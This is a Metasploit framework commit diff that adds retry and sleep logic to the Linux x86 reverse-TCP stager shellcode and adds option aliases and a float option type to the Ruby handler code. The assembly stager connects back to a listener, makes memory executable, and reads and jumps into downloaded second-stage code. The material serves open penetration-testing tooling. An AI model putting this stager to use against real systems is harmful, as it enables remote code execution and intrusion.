Land rapid7#8720, add resiliency (retries + sleep) to linux x86 stagers

Author: Brent Cook

external/source/shellcode/linux/ia32/stager_sock_reverse.asm

@@ -1,9 +1,9 @@
 ;;
-; 
+;
 ;        Name: stager_sock_reverse
 ;   Qualities: Can Have Nulls
 ;     Version: $Revision: 1512 $
-;     License: 
+;     License:
 ;
 ;        This file is part of the Metasploit Exploit Framework
 ;        and is subject to the same licenses and copyrights as
@@ -33,11 +33,13 @@ BITS   32
 GLOBAL _start
 
 _start:
+	push 0x5              ; retry counter
+	pop esi
+
+create_socket:
 	xor  ebx, ebx
 	mul  ebx
-
-; int socket(int domain, int type, int protocol);
-socket:
+	; int socket(int domain, int type, int protocol);
 	push ebx              ; protocol = 0 = first that matches this type and domain, i.e. tcp
 	inc  ebx              ; 1 = SYS_SOCKET
 	push ebx              ; type     = 1 = SOCK_STREAM
@@ -47,13 +49,15 @@ socket:
 	int  0x80
 	xchg eax, edi
 
-; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
-connect:
-	pop  ebx
+set_address:
+	pop ebx                    ; set ebx back to zero
 	push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
 	push 0xbfbf0002       ; addr->sin_port = 49087
 	                      ; addr->sin_family = 2 = AF_INET
 	mov  ecx, esp         ; ecx = addr
+
+; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+try_connect:
 	push byte 0x66        ; __NR_socketcall
 	pop  eax
 	push eax              ; addrlen
@@ -62,6 +66,22 @@ connect:
 	mov  ecx, esp         ; socketcall args
 	inc  ebx              ; 3 = SYS_CONNECT
 	int  0x80
+	test eax, eax
+	jns mprotect
+
+handle_failure:
+	push 0xa2
+	pop eax
+	push 0x0              ; sleep_nanoseconds
+	push 0x5              ; sleep_seconds
+	mov ebx, esp
+	xor ecx, ecx
+	int 0x80              ; sys_nanosleep
+	test eax, eax
+	js failed
+	dec esi
+	jnz create_socket
+	jmp failed
 
 %ifndef USE_SINGLE_STAGE
 
@@ -74,6 +94,8 @@ mprotect:
 	shl  ebx, 12
 	mov  al, 0x7d         ; __NR_mprotect
 	int  0x80
+	test eax, eax
+	js failed
 
 ; ssize_t read(int fd, void *buf, size_t count);
 recv:
@@ -83,6 +105,13 @@ recv:
 	mov  dh, 0xc          ; count = 0xc00
 	mov  al, 0x3          ; __NR_read
 	int  0x80
+	test eax, eax
+	js failed
 	jmp  ecx
 
+failed:
+	mov eax, 0x1
+	mov ebx, 0x1          ; set exit status to 1
+	int 0x80              ; sys_exit
+
 %endif

lib/msf/core/data_store.rb

@@ -14,10 +14,13 @@ class DataStore < Hash
   #
   def initialize()
     @options     = Hash.new
+    @aliases     = Hash.new
     @imported    = Hash.new
     @imported_by = Hash.new
   end
 
+  attr_accessor :aliases
+
   #
   # Clears the imported flag for the supplied key since it's being set
   # directly.
@@ -133,11 +136,16 @@ def import_options_from_hash(option_hash, imported = true, imported_by = nil)
     }
   end
 
-  def import_option(key, val, imported=true, imported_by=nil, option=nil)
+  def import_option(key, val, imported = true, imported_by = nil, option = nil)
     self.store(key, val)
 
+    if option
+      option.aliases.each do |a|
+        @aliases[a.downcase] = key.downcase
+      end
+    end
     @options[key] = option
-    @imported[key]    = imported
+    @imported[key] = imported
     @imported_by[key] = imported_by
   end
 
@@ -245,9 +253,15 @@ def each(&block)
   #
   def find_key_case(k)
 
+    # Scan each alias looking for a key
+    search_k = k.downcase
+    if @aliases.has_key?(search_k)
+      search_k = @aliases[search_k]
+    end
+
     # Scan each key looking for a match
     self.each_key do |rk|
-      if (rk.downcase == k.downcase)
+      if rk.downcase == search_k
         return rk
       end
     end
@@ -317,6 +331,7 @@ def copy
     self.keys.each do |k|
       clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k])
     end
+    clone.aliases = self.aliases
     clone
   end
 end

lib/msf/core/handler/reverse_tcp.rb

@@ -45,10 +45,26 @@ def initialize(info = {})
     # XXX: Not supported by all modules
     register_advanced_options(
       [
-        OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
-        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
-        OptBool.new('ReverseListenerThreaded', [ true, 'Handle every connection in a new thread (experimental)', false])
-      ], Msf::Handler::ReverseTcp)
+        OptInt.new(
+          'StagerRetryCount',
+          [ true, 'The number of connection attempts to try before exiting the process', 10 ],
+          aliases: ['ReverseConnectRetries']
+        ),
+        OptFloat.new(
+          'StagerRetryWait',
+          [ false, 'Number of seconds to wait for the stager between reconnect attempts', 5.0 ]
+        ),
+        OptAddress.new(
+          'ReverseListenerBindAddress',
+          [ false, 'The specific IP address to bind to on the local system' ]
+        ),
+        OptBool.new(
+          'ReverseListenerThreaded',
+          [ true, 'Handle every connection in a new thread (experimental)', false ]
+        )
+      ],
+      Msf::Handler::ReverseTcp
+    )
 
     self.conn_threads = []
   end
@@ -88,13 +104,12 @@ def payload_uri
   #
   # @param addr [String] the address that
   # @return [String] A URI of the form +scheme://host:port/+
-  def listener_uri(addr=datastore['ReverseListenerBindAddress'])
+  def listener_uri(addr = datastore['ReverseListenerBindAddress'])
     addr = datastore['LHOST'] if addr.nil? || addr.empty?
     uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr
     "tcp://#{uri_host}:#{bind_port}"
   end
 
-
   #
   # Starts monitoring for an inbound connection.
   #
@@ -118,8 +133,8 @@ def start_handler
         rescue StandardError => e
           wlog [
             "#{handler_name}: Exception raised during listener accept: #{e.class}",
-            "#{$ERROR_INFO}",
-            "#{$ERROR_POSITION.join("\n")}"
+            $ERROR_INFO.to_s,
+            $ERROR_POSITION.join("\n")
           ].join("\n")
         end
       end
@@ -216,13 +231,11 @@ def stop_handler
     # Terminate the handler thread
     handler_thread.kill if handler_thread && handler_thread.alive? == true
 
-    if listener_sock
-      begin
-        listener_sock.close
-      rescue IOError
-        # Ignore if it's listening on a dead session
-        dlog("IOError closing listener sock; listening on dead session?", LEV_1)
-      end
+    begin
+      listener_sock.close if listener_sock
+    rescue IOError
+      # Ignore if it's listening on a dead session
+      dlog("IOError closing listener sock; listening on dead session?", LEV_1)
     end
   end
 

lib/msf/core/opt_base.rb

@@ -22,7 +22,7 @@ class OptBase
     # attrs[3] = possible enum values
     # attrs[4] = Regex to validate the option
     #
-    def initialize(in_name, attrs = [])
+    def initialize(in_name, attrs = [], aliases: [])
       self.name     = in_name
       self.advanced = false
       self.evasion  = false
@@ -45,6 +45,7 @@ def initialize(in_name, attrs = [])
           raise("Invalid Regex #{regex_temp}: #{e}")
         end
       end
+      self.aliases = aliases
     end
 
     #
@@ -159,6 +160,10 @@ def display_value(value)
     # A optional regex to validate the option value
     #
     attr_accessor :regex
+    #
+    # Aliases for this option for backward compatibility
+    #
+    attr_accessor :aliases
 
     protected
 

lib/msf/core/opt_float.rb

@@ -0,0 +1,24 @@
+# -*- coding: binary -*-
+
+module Msf
+  ###
+  #
+  # Float option.
+  #
+  ###
+  class OptFloat < OptBase
+    def type
+      'float'
+    end
+
+    def normalize(value)
+      Float(value) if value.present? && valid?(value)
+    end
+
+    def valid?(value, check_empty: true)
+      return false if check_empty && empty_required_value?(value)
+      Float(value) rescue return false if value.present?
+      super
+    end
+  end
+end

lib/msf/core/opt_int.rb

@@ -1,36 +1,28 @@
 # -*- coding: binary -*-
 
 module Msf
-
-###
-#
-# Integer option.
-#
-###
-class OptInt < OptBase
-  def type
-    return 'integer'
-  end
-
-  def normalize(value)
-    if value.to_s.match(/^0x[a-fA-F\d]+$/)
-      value.to_i(16)
-    elsif value.present?
-      value.to_i
-    else
-      nil
+  ###
+  #
+  # Integer option.
+  #
+  ###
+  class OptInt < OptBase
+    def type
+      'integer'
     end
-  end
 
-  def valid?(value, check_empty: true)
-    return false if check_empty && empty_required_value?(value)
-
-    if value.present? and not value.to_s.match(/^0x[0-9a-fA-F]+$|^-?\d+$/)
-      return false
+    def normalize(value)
+      if value.to_s.match?(/^0x[a-fA-F\d]+$/)
+        value.to_i(16)
+      elsif value.present?
+        value.to_i
+      end
     end
 
-    return super
+    def valid?(value, check_empty: true)
+      return false if check_empty && empty_required_value?(value)
+      return false if value.present? && !value.to_s.match?(/^0x[0-9a-fA-F]+$|^-?\d+$/)
+      super
+    end
   end
 end
-
-end

lib/msf/core/option_container.rb

@@ -12,6 +12,7 @@ module Msf
   autoload :OptBool, 'msf/core/opt_bool'
   autoload :OptEnum, 'msf/core/opt_enum'
   autoload :OptInt, 'msf/core/opt_int'
+  autoload :OptFloat, 'msf/core/opt_float'
   autoload :OptPath, 'msf/core/opt_path'
   autoload :OptPort, 'msf/core/opt_port'
   autoload :OptRaw, 'msf/core/opt_raw'
@@ -35,6 +36,7 @@ module Msf
   # * {OptAddress} - IP address or hostname
   # * {OptPath}    - Path name on disk or an Object ID
   # * {OptInt}     - An integer value
+  # * {OptFloat}   - A float value
   # * {OptEnum}    - Select from a set of valid values
   # * {OptAddressRange} - A subnet or range of addresses
   # * {OptRegexp}  - Valid Ruby regular expression